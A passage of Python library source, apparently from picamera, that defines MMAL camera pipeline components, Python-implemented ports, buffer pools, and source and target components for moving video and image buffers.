raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera info structure revision")
def _set_info_rev(self, value):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
except IndexError:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "invalid camera info structure revision")
info_rev = property(_get_info_rev, _set_info_rev, doc="""\
The camera information capabilities of the firmware have evolved over
time and several structures are available for querying camera
information. When initialized, :class:`MMALCameraInfo` will attempt
to discover which structure is in use by the extant firmware. This
property can be used to discover the structure version and to modify
the version in use for other purposes (e.g. testing).
""")
class MMALComponent(MMALBaseComponent):
"""
Represents an MMAL component that acts as a filter of some sort, with a
single input that connects to an upstream source port. This is an asbtract
base class.
"""
__slots__ = ()
def __init__(self):
super(MMALComponent, self).__init__()
assert len(self.opaque_input_subformats) == 1
def close(self):
self.disconnect()
super(MMALComponent, self).close()
def enable(self):
super(MMALComponent, self).enable()
if self.connection is not None:
self.connection.enable()
def disable(self):
if self.connection is not None:
self.connection.disable()
super(MMALComponent, self).disable()
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
class MMALSplitter(MMALComponent):
"""
Represents the MMAL splitter component. This component has 1 input port
and 4 output ports which all generate duplicates of buffers passed to the
input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
"""
Represents the MMAL ISP resizer component. This component has 1 input port
and 1 output port, and supports resizing via the VideoCore ISP, along with
conversion of numerous formats into numerous other formats (e.g. OPAQUE to
RGB, etc). This is more efficient than :class:`MMALResizer` but is only
available on later firmware versions.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
opaque_input_subformats = ('OPQV-single',)
opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
"""
Represents the MMAL VPU resizer component. This component has 1 input port
and 1 output port. This supports resizing via the VPU. This is not as
efficient as :class:`MMALISPResizer` but is available on all firmware
verions. The output port can (and usually should) have a different frame
size to the input port.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
opaque_input_subformats = (None,)
opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
"""
Represents a generic MMAL encoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoEncoder(MMALEncoder):
"""
Represents the MMAL video encoder component. This component has 1 input
port and 1 output port. The output port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
Represents the MMAL iamge decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
# but what about output ports?
try:
# XXX Return value? If it's an input port we should ignore it,
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
